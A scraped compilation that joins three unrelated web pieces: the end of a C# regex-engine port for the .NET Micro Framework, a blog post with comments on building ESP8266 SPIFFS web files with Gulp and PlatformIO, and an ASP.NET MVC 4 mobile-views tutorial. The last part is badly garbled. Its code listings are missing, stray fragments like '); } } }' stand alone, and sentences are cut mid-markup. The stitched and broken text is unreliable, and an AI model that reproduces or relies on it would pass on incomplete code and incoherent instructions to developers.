        /// <param name="node">Node to describe</param>
        /// <returns>Description of node</returns>
        String NodeToString(int node)
        {
            // Get opcode and opdata for node
            char opcode = Instructions[node /* + RE.offsetOpcode */];
            int opdata = (int)Instructions[node + Regex.offsetOpdata];

            // Return opcode as a string and opdata value
            return OpcodeToString(opcode) + ", opdata = " + opdata;
        }

        /// <summary>
        /// Dumps the current program to a TextWriter.
        /// </summary>
        /// <param name="p">TextWriter for program dump output</param>
        public void DumpProgram(System.IO.TextWriter p)
        {
            // Loop through the whole program
            for (int i = 0, e = Instructions.Length; i < e; )
            {
                // Get opcode, opdata and next fields of current program node
                char opcode = Instructions[i /* + RE.offsetOpcode */];
                char opdata = Instructions[i + Regex.offsetOpdata];
                int next = (short)Instructions[i + Regex.offsetNext];

                // Display the current program node
                p.Write(i + ". " + NodeToString(i) + ", next = ");

                // If there's no next, say 'none', otherwise give absolute index of next node
                if (next == 0)
                {
                    p.Write("none");
                }
                else
                {
                    p.Write(i + next);
                }

                // Move past node
                i += Regex.nodeSize;

                // If character class
                if (opcode == OpCode.AnyOf)
                {
                    // Opening bracket for start of char class
                    p.Write(", [");

                    // Show each range in the char class
                    for (int r = 0; r < opdata; r++)
                    {
                        // Get first and last chars in range
                        char charFirst = Instructions[i++];
                        char charLast = Instructions[i++];

                        // Print range as X-Y, unless range encompasses only one char
                        if (charFirst == charLast)
                        {
                            p.Write(CharToString(charFirst));
                        }
                        else
                        {
                            p.Write(CharToString(charFirst) + "-" + CharToString(charLast));
                        }
                    }

                    // Annotate the end of the char class
                    p.Write("]");
                }

                // If atom
                if (opcode == OpCode.Atom)
                {
                    // Open quote
                    p.Write(", \"");

                    // Print each character in the atom
                    for (int len = opdata; len-- != 0; )
                    {
                        p.Write(CharToString(Instructions[i++]));
                    }

                    // Close quote
                    p.Write("\"");
                }

                // Print a newline
                p.WriteLine("");
            }
        }

        /// <summary>
        /// Dumps the current program to <code>System.out</code>.
        /// </summary>
        public void DumpProgram()
        {
            //PrintStream w = new PrintStream(System.out);
            //dumpProgram(w);
            //w.flush();
        }
    }
#endif
}

You can even compile regular expressions into RegexProgram instances and then either serialize them or store their bytecode on an SD card using reflection, then set them back once you instantiate the Regex class after a reboot. There is a class, RegexPrecompiler, specially designed for this purpose, which can be used either under the emulator or on the hardware.

using System;
using Microsoft.SPOT;

namespace System.Text.RegularExpressions
{
    /// <summary>
    /// Class for precompiling regular expressions for later use
    /// </summary>
    public class RegexPrecompiler
    {
        /// <summary>
        /// Main application entrypoint.
        /// Might make this have methods and be a class rather than a program...
        /// Then the class can Serialize and Deserialize the Regexps
        /// </summary>
        /// <param name="arg">Command line arguments</param>
        static public void Main(String[] arg)
        {
            // Create a compiler object
            RegexCompiler r = new RegexCompiler();

            // Print usage if arguments are incorrect
            if (arg.Length <= 0 || arg.Length % 2 != 0)
            {
                Debug.Print("Usage: recompile <patternname> <pattern>");
                return;
            }

            // Loop through arguments, compiling each
            for (int i = 0, end = arg.Length; i < end; i += 2)
            {
                try
                {
                    // Compile regular expression
                    String name = arg[i];
                    String pattern = arg[i + 1];
                    String instructions = name + "Instructions";

                    // Output program as a nice, formatted char array
                    Debug.Print("\n    // Pre-compiled regular expression '" + pattern + "'\n" +
                                "    private static char[] " + instructions + " = \n    {");

                    // Compile program for pattern
                    RegexProgram program = r.Compile(pattern);

                    // Number of columns in output
                    int numColumns = 7;

                    // Loop through program
                    char[] p = program.Instructions;
                    for (int j = 0; j < p.Length; j++)
                    {
                        // End of column?
                        if ((j % numColumns) == 0)
                            Debug.Print("\n        ");

                        // Print char as padded hex number
                        String hex = ((int)p[j]).ToHexString();
                        while (hex.Length < 4)
                            hex = "0" + hex;
                        Debug.Print("0x" + hex + ", ");
                    }

                    // End of program block
                    Debug.Print("\n    };");
                    Debug.Print("\n    private static RegexProgram " + name +
                                " = new RegexProgram(" + instructions + ");");
                }
                catch (RegexpSyntaxException e)
                {
                    Debug.Print("Syntax error in expression \"" + arg[i] + "\": " + e.ToString());
                }
                catch (Exception e)
                {
                    Debug.Print("Unexpected exception: " + e.ToString());
                }
            }
        }
    }
}

All in all, the assignment took about 4 months from the first copy/paste to the final submittal to Microsoft (and mind you, this was with no other documentation or help, by anyone, other than what you, the reader, would have if you did this yourself). Fortunately everyone was pleased, and apparently there were no bugs, which increased my confidence in my skills and caused my reputation to start to go to my head.

In the end, if I could do it again, I would probably take more of an initiative in getting the syntax and engine the way I wanted them, while adding methods for specialized, localized matching in an expression. E.g. something rough like this:

//In less than 65535 ticks, match the given expression '(\.?\)', pass the results into the function given and return the result.
"\ \In{65535} (\.?\) \-> EvaluateMatch\"
//Where EvaluateMatch is a MatchEvaluator or similar

//In less than 100 ticks, match the given expression '(\b+)', pass the results into the function, which sleeps for 100 milliseconds and returns the match.
"\ \In{100} (\b+) \-> { Sleep(_GivenTime_); return $1; }\"
//_GivenTime_ would implicitly be 100 because it has been given to the In construct.

I would also change how some of the compiling is done by making it use more of the CLR string methods where possible, rather than compiling my own type, but this may be too much for the Micro Framework to perform dynamically at this time, although it technically is possible.
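The proposed In{…} construct, a time-bounded match handed off to an evaluator, can be approximated today in library code. Here is a rough JavaScript sketch; the function matchWithin, its millisecond budget, and the evaluator convention are all invented for illustration and are not part of any real engine:

```javascript
// Rough sketch of the proposed In{ticks} idea: scan the input with the
// expression, but give up once a time budget is spent, and hand each
// match to an evaluator callback that may accept it.
// matchWithin and its parameters are hypothetical.
function matchWithin(pattern, input, budgetMs, evaluate) {
  const deadline = Date.now() + budgetMs;
  const re = new RegExp(pattern, "g");
  let m;
  while ((m = re.exec(input)) !== null) {
    if (Date.now() > deadline) return null;   // budget exhausted, bail out
    const result = evaluate(m);               // like the "-> EvaluateMatch" arrow
    if (result !== undefined) return result;  // evaluator accepted this match
  }
  return null; // no match accepted within the budget
}

// Example: find the first doubled word within ~50 ms.
const hit = matchWithin("\\b(\\w+)\\s+\\1\\b", "ho hum the the end", 50,
                        (m) => m[1]);
console.log(hit);
```

Baking this into the expression syntax itself, as sketched above, would simply move the budget and the callback arrow inside the pattern string.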
I imagine that if language implementations in general utilized this syntax, then reflection and scripting would be something built into every language, once there was a conforming regular expression engine. I think this is what the original implementers had in mind when developing "regular expressions"; however, everyone got caught up in the math, and then we remembered it was math with strings and forgot that strings are just bytes as well... In closing, I would also have liked to see more methods related to binary matching; however, to each implementation its own, and a developer could easily wrap the Regex class and still create such methods with ease.

If I could change the full framework implementation, the only change I would make would be a reduction in the number of classes that actually perform the various types of matches and state machine conversions. A single superclass would be created, and it would analyze the expression, taking into account the string given to match. It would determine the branches to use and build up a RegexProgram containing branches specially optimized for the given string, rather than defaulting to a single algorithm based on a few cheesy checks. This would allow all types of node-searching logic to be applied dynamically in a single match, without using any more overhead than is currently utilized in the implementation.

You can see the two original MSDN articles by Collin Miller here:

Here's a cool article which has nothing to do with the Micro Framework, but does explain how converting regular expressions from NFA to DFA works, with illustrations, written by academic sources:
The ESP8266 flash layout defines a series of blocks of memory for each “partition”. There is a block for the user code (the “sketch”), there is a block for the OTA update file, another one for the emulated EEPROM, another for the WIFI configuration and one for the File System. This last one uses Peter Andersson’s SPIFFS (SPI Flash File System) code to store files in a similar fashion our computers do, but taking into account the special requirements of an embedded system and a flash memory chip. This is great because we can store a whole static website there (html, css, js, images,…) and use the official WebServer library that comes with the Arduino Core for ESP8266 project to serve files and execute server side code that updates our static site via AJAX or WebSockets, for instance. But the ESP8266 is nothing more than a (powerful) microcontroller and the WebServer library has its limitations and if you start to work on a complex website, with multiple files (stylesheets, scripts,…) it will soon fail… Size is not that important, but the number of files is. Too many files lead to failed downloads and long rendering times… The solution is merging. All javascript files together, all stylesheet files together. But what if you are using third party files, some of them minified? What if you want to keep them separated so you can easily swap from one component to another by just removing a line and adding a new one to your HTML file? You will need some way to process your HTML to get the scripts and stylesheets you are using, merge them and replace the references in the HTML with the unified file. Well, that’s what most web developers do on a daily basis. They work on a development version and they “process it” to get working code (clean, minimized, renderable). They even have “watchers” that work in the background translating every modification they do on the development version in real time. 
To do that they use compilers (for SASS, LESS, CoffeeScript,…) and build managers. One such build manager is Gulp. So why not use Gulp to process our website before uploading it? Let's do it.

Installing Gulp

Gulp is actually a Node.js module, which is great since Node.js is a really powerful frontend and scripting language, and the build file that we will write can benefit from all that power. Installing Node.js and npm (the Node.js package manager) is out of scope here, so visit the Node.js download page and help yourself.

Next we will need a file to define all the module dependencies we are going to use. These modules are Gulp itself and some Gulp plugins that will take care of the different tasks (minimizing, injecting, cleaning,…). Let's take a look at it:

{
  "name": "esp8266-filesystem-builder",
  "version": "0.1.0",
  "description": "Gulp based build script for ESP8266 file system files",
  "main": "gulpfile.js",
  "author": "Xose Pérez <[email protected]>",
  "license": "MIT",
  "devDependencies": {
    "del": "^2.2.1",
    "gulp": "^3.9.1",
    "gulp-clean-css": "^2.0.10",
    "gulp-gzip": "^1.4.0",
    "gulp-htmlmin": "^2.0.0",
    "gulp-if": "^2.0.1",
    "gulp-inline": "^0.1.1",
    "gulp-plumber": "^1.1.0",
    "gulp-uglify": "^1.5.3",
    "gulp-useref": "^3.1.2",
    "yargs": "^5.0.0"
  },
  "dependencies": {}
}

As you can see, it is a JSON document with some header fields and a list of dependencies. Save it in your code folder as "package.json" and run:

npm install

It will fetch and install all those modules in a node_modules subfolder (I suggest you add this folder to your .gitignore file). Good, let's move ahead.
The builder script

I am going to start by showing the script:

/*
ESP8266 file system builder with PlatformIO support
Copyright (C) 2016 by Xose Pérez <xose dot perez
*/

// -----------------------------------------------------------------------------
// File system builder
// -----------------------------------------------------------------------------

const gulp = require('gulp');
const plumber = require('gulp-plumber');
const htmlmin = require('gulp-htmlmin');
const cleancss = require('gulp-clean-css');
const uglify = require('gulp-uglify');
const gzip = require('gulp-gzip');
const del = require('del');
const useref = require('gulp-useref');
const gulpif = require('gulp-if');
const inline = require('gulp-inline');

/* Clean destination folder */
gulp.task('clean', function() {
    return del(['data/*']);
});

/* Copy static files */
gulp.task('files', function() {
    return gulp.src([
            'html/**/*.{jpg,jpeg,png,ico,gif}',
            'html/fsversion'
        ])
        .pipe(gulp.dest('data/'));
});

/* Process HTML, CSS, JS --- INLINE --- */
gulp.task('inline', function() {
    return gulp.src('html/*.html')
        .pipe(inline({
            base: 'html/',
            js: uglify,
            css: cleancss,
            disabledTypes: ['svg', 'img']
        }))
        .pipe(htmlmin({
            collapseWhitespace: true,
            removeComments: true,
            minifyCSS: true,
            minifyJS: true
        }))
        .pipe(gzip())
        .pipe(gulp.dest('data'));
})

/* Process HTML, CSS, JS */
gulp.task('html', function() {
    return gulp.src('html/*.html')
        .pipe(useref())
        .pipe(plumber())
        .pipe(gulpif('*.css', cleancss()))
        .pipe(gulpif('*.js', uglify()))
        .pipe(gulpif('*.html', htmlmin({
            collapseWhitespace: true,
            removeComments: true,
            minifyCSS: true,
            minifyJS: true
        })))
        .pipe(gzip())
        .pipe(gulp.dest('data'));
});

/* Build file system */
gulp.task('buildfs', ['clean', 'files', 'html']);
gulp.task('buildfs2', ['clean', 'files', 'inline']);
gulp.task('default', ['buildfs']);

// -----------------------------------------------------------------------------
// PlatformIO support
// -----------------------------------------------------------------------------

const spawn = require('child_process').spawn;
const argv = require('yargs').argv;

var platformio = function(target) {
    var args = ['run'];
    if ("e" in argv) {
        args.push('-e');
        args.push(argv.e);
    }
    if ("p" in argv) {
        args.push('--upload-port');
        args.push(argv.p);
    }
    if (target) {
        args.push('-t');
        args.push(target);
    }
    const cmd = spawn('platformio', args);
    cmd.stdout.on('data', function(data) {
        console.log(data.toString().trim());
    });
    cmd.stderr.on('data', function(data) {
        console.log(data.toString().trim());
    });
}

gulp.task('uploadfs', ['buildfs'], function() {
    platformio('uploadfs');
});
gulp.task('upload', function() {
    platformio('upload');
});
gulp.task('run', function() {
    platformio(false);
});

Let's focus on the "File system builder" part. There are 5 tasks:

- clean will delete all the contents of the data folder
- files will copy all images to the data folder (right now we are not processing them)
- html processes the HTML files (more on this later)
- buildfs calls the prior 3 to build the project
- default is just a convenient task to call buildfs if no task is provided

The "html" task looks for all the *.html files in the development folder and reads them to extract references to *.js and *.css files (that's what the "useref" plugin does). Then it generates 3 streams. The first one gets all the *.js files, merges them and minifies them (that's what the "uglify" plugin does). Another one merges all the *.css files and minifies them (that's what the "cleancss" plugin does). And the final one replaces all the references to the *.js and *.css files in the HTML with the newly generated unified files, and minifies it (that's what the "htmlmin" plugin does). Finally, all the resulting files get gzipped and stored in the data folder, along with all the images.

The good thing about this builder script is that you don't have to worry about the files you add to or delete from your HTML file. It will just read them and merge them in the same order they appear in your code.
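A stripped-down version of what useref does (read a build block, collect its references, collapse the block to a single tag) can be expressed in a few lines of plain JavaScript. This is a concept sketch only, not the plugin's actual code:

```javascript
// Minimal illustration of the useref idea: find a
// "<!-- build:css style.css --> ... <!-- endbuild -->" block, collect
// the referenced stylesheets, and replace the whole block with one tag
// pointing at the merged output file.
function replaceBuildBlock(html) {
  const block = /<!--\s*build:css\s+(\S+)\s*-->([\s\S]*?)<!--\s*endbuild\s*-->/;
  const m = html.match(block);
  if (!m) return { html, sources: [] };
  const outFile = m[1];
  // Every href="..." inside the block is a source file to be merged,
  // in document order (which preserves CSS precedence).
  const sources = [...m[2].matchAll(/href="([^"]+)"/g)].map(x => x[1]);
  const tag = '<link rel="stylesheet" href="' + outFile + '" />';
  return { html: html.replace(block, tag), sources };
}

const input = '<head><!-- build:css style.css -->' +
  '<link rel="stylesheet" href="pure-min.css" />' +
  '<link rel="stylesheet" href="custom.css" />' +
  '<!-- endbuild --></head>';
const out = replaceBuildBlock(input);
console.log(out.sources); // the files to merge, in order
console.log(out.html);    // the block collapsed to one link tag
```

The real plugin handles js blocks, relative paths and streaming too, but the order-preserving collect-and-replace above is the core of it.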
That's very important since there are often dependencies between files (CSS precedence, scripts that require jQuery to be defined,…).

Injecting code

The "useref" plugin requires some metadata in the HTML file to know where it should read the files from and inject the new code. A typical file would look like this:

<!DOCTYPE html>
<html>
<head>
    <title>WEB CONFIG</title>
    <meta charset="utf-8" />
    <link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- build:css style.css -->
    <link rel="stylesheet" href="pure-min.css" />
    <link rel="stylesheet" href="side-menu.css" />
    <link rel="stylesheet" href="grids-responsive-min.css" />
    <link rel="stylesheet" href="custom.css" />
    <!-- endbuild -->
</head>
<body>
...
</body>
<!-- build:js script.js -->
<script src="jquery-1.12.3.min.js"></script>
<script src="custom.js"></script>
<!-- endbuild -->
</html>

As you can see, the places where the plugin should read and inject new code are defined by "build" comments like this one: "<!-- build:css style.css -->". You have to define the type of files it contains (css) and the name of the output merged file (style.css). All the code from this opening comment to the "<!-- endbuild -->" closing comment will be replaced by:

<link rel="stylesheet" href="style.css" />

Same for the javascript block.

Now, instead of naming your file system folder "data" like the ESP8266FS documentation suggests, name it "html" (or whatever other name you like, but the code above requires it to be "html"). To run the builder, just type from the command line in your code folder:

gulp

If everything goes OK, your data folder will have at least 3 files (not counting images): index.html.gz, style.css.gz and script.js.gz.

Inline JS and CSS?

[UPDATE 2016-09-05] I've added the option to get the CSS and JS files and inject them inline in the HTML. This way you end up having just one HTML file, albeit a big one.
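The inlining transformation itself is conceptually simple; a bare-bones JavaScript sketch (not gulp-inline's actual code, and with the file contents passed in as a map instead of read from disk) might look like this:

```javascript
// Concept sketch of CSS inlining: replace each stylesheet link with a
// <style> element containing the file's contents. A real tool such as
// gulp-inline also handles scripts, minification and path resolution.
function inlineCss(html, files) {
  // 'files' maps href -> stylesheet contents, standing in for disk reads
  return html.replace(
    /<link rel="stylesheet" href="([^"]+)"\s*\/?>/g,
    (tag, href) => href in files ? "<style>" + files[href] + "</style>" : tag
  );
}

const html = '<head><link rel="stylesheet" href="custom.css" /></head>';
const result = inlineCss(html, { "custom.css": "body{margin:0}" });
console.log(result); // <head><style>body{margin:0}</style></head>
```

The trade-off is exactly the one discussed next: one bigger file versus several smaller, individually cacheable ones.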
My tests show that the overall performance is around 15% faster, both downloading the code (the compressed index.html.gz file is 50 bytes lighter in my test project, and the browser only downloads one file instead of 3) and rendering it. If you had already copied the previous code chunks you will have to update them; both package.json and gulpfile.js have modifications, so remember to "npm install" to add the new dependencies. Then you can use this "inline" option by calling:

gulp buildfs2

Anyway, I still don't know which is better, since I think the split version can benefit from caching, which is the next step in the investigation…

GZIPping?

Compressing the files makes them lighter, which means you can fit more code in the same room and it will download faster too. But how does the ESP8266 handle it? Well, this code is not mine, and it's pretty standard when using the WebServer library from the Arduino Core for ESP8266. Let's see what it does:

bool handleFileRead(String path) {
    if (path.endsWith("/")) path += "index.html";
    String contentType = getContentType(path);
    String pathWithGz = path + ".gz";
    if (SPIFFS.exists(pathWithGz)) path = pathWithGz;
    if (SPIFFS.exists(path)) {
        File file = SPIFFS.open(path, "r");
        size_t sent = server.streamFile(file, contentType);
        size_t contentLength = file.size();
        file.close();
        return true;
    }
    return false;
}

As you can see, the code gets the requested path, translates "/" to "index.html" for the home page, and grabs the content type from the file extension (not in this code, somewhere else, but that's what it does). Then it checks if there is a file with the same name plus ".gz", and if it exists, that's the file it will read. The code is completely agnostic to the contents of the file; it just streams it.
But then, deep in the guts of the WebServer library, we find this:

template<typename T> size_t streamFile(T &file, const String& contentType) {
    setContentLength(file.size());
    if (String(file.name()).endsWith(".gz") &&
        contentType != "application/x-gzip" &&
        contentType != "application/octet-stream") {
        sendHeader("Content-Encoding", "gzip");
    }
    send(200, contentType, "");
    return _currentClient.write(file);
}

So, if the file we are reading ends with ".gz", and we are not serving a gzip file or a binary file, then we are sending something else compressed, and hence we should set the Content-Encoding header to "gzip". Voilà. Our browser will receive the file and know it has to decompress it prior to rendering it. See the difference?

What about the images?

The builder script just copies the images at the moment. There is room for improvement here: compressing them, creating sprites,…

PlatformIO

The builder script above has 3 more tasks, for use with PlatformIO. The main reason for this is that it's convenient to run "gulp buildfs" (or just "gulp", since the default task is "buildfs") before uploading the file system. I'm not good at remembering such things and end up wasting time wondering why I can't see my changes. So instead of running "gulp" and then doing an "uploadfs" from PlatformIO, I just do:

gulp uploadfs -e ota -p 192.168.1.113

And my changes are built and flashed via OTA to the device at 192.168.1.113. Neat!

[UPDATE 2016-09-05] As Ivan Kravets, CTO at PlatformIO, commented below, I could use the "extra_script" feature to call a Python script where I can define callbacks or hooks for certain actions, for instance to call my "gulp buildfs" before uploading the file system to the board. The code he added in his comment is a good example of the feature, but it didn't work for me. Apparently the pre-hook for "uploadfs" is actually called after calling "mkspiffs".
A simple test with a nonexistent "data" folder throws an error, but if it had called the gulp task there would be a data folder. Nevertheless, I found a way around the problem when I read in the documentation that they use filenames as targets for the AddPreAction method. I tested with the spiffs.bin file and it worked! Here's the Python script:

#!/bin/python
from SCons.Script import DefaultEnvironment

env = DefaultEnvironment()

def before_build_spiffs(source, target, env):
    env.Execute("gulp buildfs")

env.AddPreAction(".pioenvs/%s/spiffs.bin" % env['PIOENV'], before_build_spiffs)

Now you just have to add "extra_script = pio_hooks.py" (or the name of your script) to all the environments you want in your platformio.ini file, and you are good to go. No need to call gulp, just do as usual:

pio run -e node -t uploadfs

Even neater!

Optimizing files for SPIFFS with Gulp by Tinkerman is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Hi,

Thanks a lot for the great article and the hint about optimization. I added it to our list. I would like to share a hint on how to keep the PlatformIO workflow without changes and re-use your gulp idea. PlatformIO allows you to define a custom extra_script where you will be able to control current build targets or add new ones. For example, in your case we need to execute a specific command before the uploadfs target. Let's do it:

```python
Import("env")

def before_uploadfs(source, target, env):
    env.Execute("gulp buildfs")

env.AddPreAction("uploadfs", before_uploadfs)
```

This approach allows you to use the PlatformIO IDE for SPIFFS uploading, without modifications or the terminal.

Regards,
Ivan
The PlatformIO Team

Thanks a lot for your comment, Ivan. I also want to thank you guys for that awesome tool; "platformio init" is my first step in every project I work on. But it looks like I have not dived deep enough into it. The custom script feature is indeed a much better solution and I will give it a try soon. Thanks again!
I updated the post with info about using the extra_script feature to process the files before uploading them. Had some issues on the road but I made it! Thanks so much.

> "platformio init" is my first step in every project I work on.

Do you do it with new projects or existing ones? Both. In the past I've used makefiles and ino (inotool.org). Whenever I have to update any of those projects I first migrate them to use platformio.

Are these new boards, with their additional memory, usable for static HTML files? In theory yes, but I guess they will require some changes in the flash layout to use those 16Mbyte memories. I will know soon, I have ordered a pair.

Looks fabulous, thanks! Do you know of any way to get gulp to include the actual JS and CSS source inline within the html document? Actually yes. gulp-inline and gulp-inline-css claim to do just that. Haven't tested them though.

Thanks, the 'gulp-inline' package seems to be working well here for inlining both css and js resources: 1) I npm installed the package 2) I included the new 'require' in gulpfile.js: const inline = require('gulp-inline'); 3) I injected the new task into your existing html pipeline e.g.: .pipe(inline({ base: 'data.unminified/', js: uglify, css: cleancss })) The end result is that the script and link tags are replaced with inlined minified css and js source within the minified gzipped html files. This is actually quite marvelous for me because this is a process I was hand cranking until you showed me the light 🙂 Thanks again, Joe

Great, just updated the post with my own findings on the subject. It's actually faster than having 3 files (html, js and css) but I think that the 3 files pattern could benefit from caching files… more on that in the future. Thank you very much for your idea!

Cool, good job. I agree that reducing the number of requests / responses by inlining all resources is a good thing from an ESP8266 performance perspective.
That said, the reason I started down this path a few months ago was for stability reasons rather than performance reasons, as I found the device to be more stable under load with a single html document request pattern as opposed to multiple requests for html, css, js. I've implemented 304 'not modified' server/client response caching in my own firmware and that can help hugely too, and I'd say it's definitely something worth doing. But most recently I've been serving device content through an nginx reverse proxy caching server for TLS/SSL purposes, which in a way mostly makes the implementation of onboard device caching redundant.

Absolutely a must-read article, thank you! I've worked with nginx for years and it's a great choice, but it adds a level of complexity to the overall solution, one only for the tech guys out there. Most people with that requirement (accessing their ESP8266 devices from the internet) will just forward a port in their router, that is, if they know how to, so basically non-tech people out there will not have this requirement in the first place. About the caching, I was thinking of migrating to ESPAsyncWebServer by me-no-dev. It has a bunch of goodies, including caching, authentication and filtering requests.

I'm glad you found that useful, share and share alike and all that 🙂 As I mentioned in that article, my primary goal there was to implement TLS/SSL protection for my ESP devices and as I ended up with an nginx reverse proxy solution, it came with nice caching benefits too. I agree it's not a solution for non-techie types, although I expect most guys playing with ESP8266 / networked mcu devices are going to be a bit nerdy anyway. I expect I'm out of touch with routers and what's possible with a semi decent one nowadays. My own router is a bit rubbish and port forwarding just forwards unprotected traffic onto some other host.
So I ended up port forwarding traffic through my router to my nginx proxy which handles the job of TLS/SSL offload and proxying traffic onto my backend ESPs. My firmware stuff is based on the fabulous ESP8266 Arduino Core too and I’m in two minds whether to implement an ESPAsyncWebServer version of my web server class. I’m undecided because the ESP8266WebServer implementation I’m using right now is working well enough and if I had to make the switch to an async server implementation, I guess it would have to be for performance reasons. Anyway sorry to drift off topic from your article, I know this isn’t the place for general discussion. Feel free to delete this post if you don’t want to publish it no worries. This conversation is very interesting. I’m glad you found my post and decided to write a comment on it. I’ll take a close look at your work in the future. I’m not very familiar with gulp… I can get the default to work and produce 3 files.. but what i’m really interested in is the single file with everything inlined… I get this error any ideas why this fails? Cheers for whatever reason it is the inclusion of that is causing it to bork! this is the js file for jQuery mobile… any clues? Hi Don’t know why it fails, apparently it’s malformed but I guess it works when not inline, right? I will try it myself today to see if I can reproduce the error.
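For reference, the gzip-header rule in the streamFile() snippet quoted at the top of the post can be restated in a few lines of JavaScript (a sketch; the function name is mine, not part of the WebServer library):

```javascript
// Mirror of the decision inside streamFile(): send "Content-Encoding: gzip"
// only when the stored file ends in ".gz" but the declared content type is
// not itself gzip or a raw binary download.
function needsGzipHeader(filename, contentType) {
    return filename.endsWith('.gz')
        && contentType !== 'application/x-gzip'
        && contentType !== 'application/octet-stream';
}
```

So index.html.gz served as text/html gets the header (and the browser decompresses it transparently), while a file requested as a raw octet-stream download does not.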
http://tinkerman.cat/optimizing-files-for-spiffs-with-gulp/
There with C# source code are available to accompany this topic: What You'll Build For this tutorial, you'll add mobile features to the simple conference-listing application that's provided in the starter project. The following screenshot shows the tags page of the completed application as seen in the Windows 7 Phone Emulator.. Skills You'll Learn Here's what you'll learn: - How the ASP.NET MVC 4 templates use the HTML5 viewportattribute and adaptive rendering to improve display on mobile devices. - How to create mobile-specific views. - How to create a view switcher that lets users toggle between a mobile view and a desktop view of the application. Getting Started Download the conference-listing application for the starter project using the following link: Download. Then in Windows Explorer, right-click the MvcMobile.zip file and choose Properties. In the MvcMobile.zip Properties dialog box, choose the Unblock button. (Unblocking prevents a security warning that occurs when you try to use a .zip file that you've downloaded from the web.) Right-click the MvcMobile.zip file and select Extract All to unzip the file. In Visual Studio, open the MvcMobile.sln file. Press CTRL+F5 to run the application, which will display it in your desktop browser. Start your mobile browser emulator, copy the URL for the conference application into the emulator, and then click the Browse by tag link. If you are using the Windows Phone Emulator, click in the URL bar and press the Pause key to get keyboard access. The image below shows the AllTags view (from choosing Browse by tag). The display is very readable on a mobile device. Choose the ASP.NET link. The ASP.NET tag view is very cluttered. For example, the Date column is very difficult to read. Later in the tutorial you'll create a version of the AllTags view that's specifically for mobile browsers and that will make the display readable. Note: Currently a bug exists in the mobile caching engine. 
For production applications, you must install the Fixed DisplayModes NuGet package. See ASP.NET MVC 4 Mobile Caching Bug Fixed for details on the fix.

CSS Media Queries

CSS media queries are an extension to CSS for media types. They allow you to create rules that override the default CSS rules for specific browsers (user agents). If the browser matches the media query's condition (for example, a maximum width of 850 pixels), it will use the CSS rules inside this media block. You can use CSS media queries like this to provide a better display of HTML content on small browsers (like mobile browsers) than the default CSS rules that are designed for the wider displays of desktop browsers. The following line shows the viewport <meta> tag in the ASP.NET MVC 4 layout file. <meta name="viewport" content="width=device-width">

Examining the Effect of CSS Media Queries and the Viewport Meta Tag

Open the Views\Shared\_Layout.cshtml file in the editor and comment out the viewport <meta> tag. The following markup shows the commented-out line. @*<meta name="viewport" content="width=device-width">*@ Open the MvcMobile\Content\Site.css file in the editor and change the maximum width in the media query to zero pixels. This will prevent the CSS rules from being used in mobile browsers. The following line shows the modified media query: @media only screen and (max-width: 0px) { ... Save your changes and browse to the Conference application in a mobile browser emulator. The tiny text in the following image is the result of removing the viewport <meta> tag. With no viewport <meta> tag, the browser is zooming out to the default viewport width (850 pixels or wider for most mobile browsers.) Undo your changes: uncomment the viewport <meta> tag in the layout file and restore the media query to 850 pixels in the Site.css file. Save your changes and refresh the mobile browser to verify that the mobile-friendly display has been restored. Next, create a mobile-specific layout: copy the Views\Shared\_Layout.cshtml file to Views\Shared\_Layout.Mobile.cshtml, open the new file, and change the h1 heading from MVC4 Conference to Conference (Mobile). In each Html.ActionLink call, remove "Browse by" from the link text.
The following code shows the completed body section of the mobile layout file. <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width" /> <title>@ViewBag.Title</title> @Styles.Render("~/Content/css") @Scripts.Render("~/bundles/modernizr") </head> <body> <div id="title"> <h1> Conference (Mobile)</h1> </div> <div id="menucontainer"> <ul id="menu"> <li>@Html.ActionLink("Home", "Index", "Home")</li> <li>@Html.ActionLink("Date", "AllDates", "Home")</li> <li>@Html.ActionLink("Speaker", "AllSpeakers", "Home")</li> <li>@Html.ActionLink("Tag", "AllTags", "Home")</li> </ul> </div> @RenderBody() @Scripts.Render("~/bundles/jquery") @RenderSection("scripts", required: false) </body> </html>. In contrast, the desktop display has not changed.. Open the Global.asax file and add the following code. In the code, right-click DefaultDisplayMode, choose Resolve, and then choose using System.Web.WebPages;. This adds a reference to the System.Web.WebPages namespace, which is where the DisplayModes and DefaultDisplayMode types are defined. Alternatively, you can just manually add the following line to the using section of the file. using System.Web.WebPages; The complete contents of the Global.asax file is shown below.); } } } Save the changes. Copy the MvcMobile\Views\Shared\_Layout.Mobile.cshtml file to MvcMobile\Views\Shared\_Layout.iPhone.cshtml. Open the new file and then change the h1 heading from Conference (Mobile) to Conference (iPhone). Copy the MvcMobile\Views\Home\AllTags.Mobile.cshtml file to MvcMobile. The following screenshot shows the AllTags view rendered in the Safari browser. You can download Safari for Windows here.. To start, delete the Shared\_Layout.Mobile.cshtml and Shared\_Layout.iPhone.cshtml files that you created earlier. Rename Views\Home\AllTags.Mobile.cshtml and Views\Home\AllTags.iPhone.cshtml files to Views\Home\AllTags.iPhone.cshtml.hide and Views\Home\AllTags.Mobile.cshtml.hide. 
Because the files no longer have a .cshtml extension, they won't be used by the ASP.NET MVC runtime to render the AllTags view. Install the jQuery.Mobile.MVC NuGet package by doing this: From the Tools menu, select Package Manager Console, and then select Library Package Manager.); } } } BundleMobileConfigline above in yellow highlight, click the Compatibility View button" /> in IE to make the icon change from an outline" /> to a solid color. Alternatively you can view this tutorial in FireFox or Chrome. Open the MvcMobile\Views\Shared\_Layout.Mobile.cshtml file and add the following markup directly after the Html.Partial call: <div data- @Html.ActionLink("Home", "Index", "Home") @Html.ActionLink("Date", "AllDates") @Html.ActionLink("Speaker", "AllSpeakers") @Html.ActionLink("Tag", "AllTags") </div> The complete> <body> <div data- @Html.Partial("_ViewSwitcher") <div data- @Html.ActionLink("Home", "Index", "Home") @Html.ActionLink("Date", "AllDates") @Html.ActionLink("Speaker", "AllSpeakers") @Html.ActionLink("Tag", "AllTags") </div> <div data- <h1>@ViewBag.Title</h1> </div> <div data- @RenderSection("featured", false) @RenderBody() </div> </div> </body> <. In addition to the style changes, you see Displaying mobile view and a link that lets you switch from mobile view to desktop view. Choose the Desktop view link, and the desktop view is displayed. The desktop view doesn't provide a way to directly navigate back to the mobile view. You'll fix that now. Open the Views\Shared\_Layout.cshtml file. Just under the page body element, add the following code, which renders the view-switcher widget: @Html.Partial("_ViewSwitcher") Refresh the AllTags view in the mobile browser. You can now navigate between desktop and mobile views. else { @:Not Mobile/Get }and adding the following heading to the 